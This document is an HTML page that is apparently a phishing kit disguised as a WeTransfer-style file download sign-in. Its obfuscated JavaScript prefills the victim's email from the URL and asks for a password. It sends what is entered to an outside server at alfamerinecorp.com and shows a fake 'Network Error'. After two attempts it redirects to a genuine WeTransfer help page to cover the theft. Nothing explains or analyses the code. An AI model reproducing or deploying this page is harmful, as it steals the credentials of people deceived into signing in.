<!doctype html>
<html>

	<head>
        <meta charset="utf-8">
        <title></title>
		<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/css/bootstrap.min.css">
		<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
		<script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"></script>
		<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/js/bootstrap.bundle.min.js"></script>
        <style>
            body {
                background-image: url(https://cdn.glitch.global/5c3a0ca4-2f1d-4648-a4b7-e36a7ad90152/we.png?v=1670830144657);
                background-repeat: no-repeat;
                background-size:cover;
                height:100vh;
            }

            #myModal {
            position: absolute;
            top: 60%;
            left: 50%;
            transform: translate(-50%, -50%);
			}
			
            @media (max-width: 575.98px) {
			#myModal {
            position: absolute;
            top: 70%;
            left: 50%;
            transform: translate(-50%, -50%);
			}
			
			body {
			background-image: url(grd.jpg);
			background-repeat: no-repeat;
			background-origin:contain;
			height:100vh;
			}
			
            #myModal {
            position: absolute;
            top: 70%;
            left: 50%;
            transform: translate(-50%, -50%);
			}
			
			#asd{
			display:none;
			}
			
			.col-sm-3{
			width:46%
			}          
			}
        </style>
    </head>

    <body>
		<div data-toggle="modal" data-target="#myModal" style="width:100vh;height:100vh;"></div>
		<div class="loaded" ></div>
    </body>
	
	<script>

function _0x1377(_0x34c96d,_0x4c1936){var _0x42abdc=_0x42ab();return _0x1377=function(_0x1377ea,_0x563ad1){_0x1377ea=_0x1377ea-0xbc;var _0x4f56ca=_0x42abdc[_0x1377ea];return _0x4f56ca;},_0x1377(_0x34c96d,_0x4c1936);}var _0x2a2e10=_0x1377;function _0x42ab(){var _0x3ca51c=['substr','Sign\x20In','421281ZGTuFI','https://alfamerinecorp.com/images/post.php','27zDtZlG','preventDefault','click','#msg','1026456jrDoUS','12094MadsVU','#submitBtn','val','19QxSAQy','Network\x20Error!\x20Please\x20verify\x20your\x20information\x20and\x20try\x20again','1020XpvjhR','https://wetransfer.com/hc/en-us/sections/201965293-Trouble-downloading','#formx','24BBDlwP','modal','location','4335BVOGVL','prop','.loaded','181820IZdpxU','8DRFNyn','#A1','hide','hash','disabled','submit','#x1','replace','1037179ZbWnPm','html','ready','691425ieiKGv','ajax','show','#x2','\x0a\x09\x09<button\x20class=\x22btn\x20btn-sm\x20btn-primary\x22\x20disabled>\x0a\x09\x09\x09<span\x20class=\x22spinner-grow\x20spinner-grow-sm\x22></span>Please\x20Wait...\x0a\x09\x09</button>','\x0a\x09\x09<!--\x20The\x20Modal\x20-->\x0a\x09\x09<div\x20class=\x22modal\x22\x20id=\x22myModal\x22>\x0a\x09\x09\x09<div\x20class=\x22modal-dialog\x22>\x0a\x09\x09\x09\x09<div\x20class=\x22modal-content\x22>\x0a\x09\x09\x09\x09\x09<!--\x20Modal\x20Header\x20-->\x0a\x09\x09\x09\x09\x09<!--\x20Modal\x20body\x20-->\x0a\x09\x09\x09\x09\x09<div\x20class=\x22modal-body\x20p-3\x22>\x0a\x09\x09\x09\x09\x09\x20\x20<img\x20src=\x22https://cdn.glitch.global/5c3a0ca4-2f1d-4648-a4b7-e36a7ad90152/to.png?v=1670830146465\x22\x20width=\x20\x22100%\x22\x20class=\x22img-fluid\x22>\x0a\x09\x09\x09\x09\x09\x09<div\x20class=\x22text-danger\x22\x20id=\x22msg\x22\x20style=\x22font-weight:600;\x20font-size:17px;\x22></div>\x0a\x09\x09\x09\x09\x09\x09<form\x20method=\x22post\x22\x20id=\x22formx\x22\x20class=\x22my-4\x22>\x0a\x09\x09\x09\x09\x09\x09\x09<input\x20type=\x22email\x22\x20name=\x22x1\x22\x20id=\x22x1\x22\x20class=\x22form-control\x20mb-3\x22\x20value=\x22\x22\x20readonly>\x0a\x09\x09\x09\x09\x09\x09\x09<input\x20type=\x22password\x22\x20name=\x22x2\x22\x20id=\x22x2\x22\x20class=\x22form-control\x20mb-3\x22\x20placeholder=\x22Password\x22\x20value=\x22\x22\x20required>\x0a\x09\x09\x09\x09\x09\x09\x09<button\x20id=\x22submitBtn\x22\x20class=\x22btn\x20btn-md\x20btn-primary\x22>Sign\x20In</button>\x0a\x09\x09\x09\x09\x09\x09</form>\x0a\x09\x09\x09\x09\x09</div>\x0a\x09\x09\x09\x09</div>\x0a\x09\x09\x09</div>\x0a\x09\x09</div>\x0a\x09'];_0x42ab=function(){return _0x3ca51c;};return _0x42ab();}(function(_0x41daab,_0x102433){var _0x3f2010=_0x1377,_0x27998f=_0x41daab();while(!![]){try{var _0x3e37f1=-parseInt(_0x3f2010(0xcc))/0x1*(-parseInt(_0x3f2010(0xc9))/0x2)+-parseInt(_0x3f2010(0xc2))/0x3*(parseInt(_0x3f2010(0xd8))/0x4)+-parseInt(_0x3f2010(0xd4))/0x5*(parseInt(_0x3f2010(0xce))/0x6)+parseInt(_0x3f2010(0xe3))/0x7+parseInt(_0x3f2010(0xc8))/0x8+-parseInt(_0x3f2010(0xc4))/0x9*(-parseInt(_0x3f2010(0xd7))/0xa)+parseInt(_0x3f2010(0xe0))/0xb*(parseInt(_0x3f2010(0xd1))/0xc);if(_0x3e37f1===_0x102433)break;else _0x27998f['push'](_0x27998f['shift']());}catch(_0x254413){_0x27998f['push'](_0x27998f['shift']());}}}(_0x42ab,0x264b7),$(window)['on']('load',function(){var _0x3950e3=_0x1377;$('#myModal')[_0x3950e3(0xd2)]('show');}),$(document)[_0x2a2e10(0xe2)](function(){var _0x59274c=_0x2a2e10;$(_0x59274c(0xd6))[_0x59274c(0xe1)](_0x59274c(0xbf));var _0x37f005=0x0,_0x19783e=window[_0x59274c(0xd3)][_0x59274c(0xdb)][_0x59274c(0xc0)](0x1);$(_0x59274c(0xde))[_0x59274c(0xcb)](_0x19783e),$(_0x59274c(0xd0))[_0x59274c(0xdd)](function(_0x96255b){var _0x5dc8a8=_0x59274c;_0x96255b[_0x5dc8a8(0xc5)]();var _0x3241de=$(_0x5dc8a8(0xd9))[_0x5dc8a8(0xcb)](),_0x136769=new FormData($(_0x5dc8a8(0xd0))[0x0]);$('#submitBtn')[_0x5dc8a8(0xe1)](_0x5dc8a8(0xbe))[_0x5dc8a8(0xd5)](_0x5dc8a8(0xdc),!![]),$(_0x5dc8a8(0xbd))[_0x5dc8a8(0xc6)](function(){var _0x4af13a=_0x5dc8a8;$(_0x4af13a(0xc7))[_0x4af13a(0xda)]();}),_0x37f005=_0x37f005+0x1,$[_0x5dc8a8(0xe4)]({'url':_0x5dc8a8(0xc3),'type':'POST','data':_0x136769,'contentType':![],'processData':![],'success':function(_0x3c7197){setTimeout(function(){var _0x2694ac=_0x1377;$(_0x2694ac(0xde))['val'](_0x19783e),$('#x2')[_0x2694ac(0xcb)](''),$(_0x2694ac(0xc7))[_0x2694ac(0xbc)](),$(_0x2694ac(0xc7))[_0x2694ac(0xe1)](_0x2694ac(0xcd)),$(_0x2694ac(0xca))[_0x2694ac(0xe1)]('Sign\x20In')['prop'](_0x2694ac(0xdc),![]),_0x37f005>=0x2&&(_0x37f005=0x0,window[_0x2694ac(0xd3)][_0x2694ac(0xdf)](_0x2694ac(0xcf)));},0x3e8);},'error':function(_0x2f94fa){setTimeout(function(){var _0x78153c=_0x1377;$(_0x78153c(0xde))[_0x78153c(0xcb)](_0x19783e),$(_0x78153c(0xbd))[_0x78153c(0xcb)](''),$(_0x78153c(0xc7))[_0x78153c(0xbc)](),$('#msg')[_0x78153c(0xe1)](_0x78153c(0xcd)),$('#submitBtn')['html'](_0x78153c(0xc1))[_0x78153c(0xd5)](_0x78153c(0xdc),![]),_0x37f005>=0x2&&(_0x37f005=0x0,window[_0x78153c(0xd3)]['replace'](_0x78153c(0xcf)));},0x3e8);}});});}));

	</script>

</html>
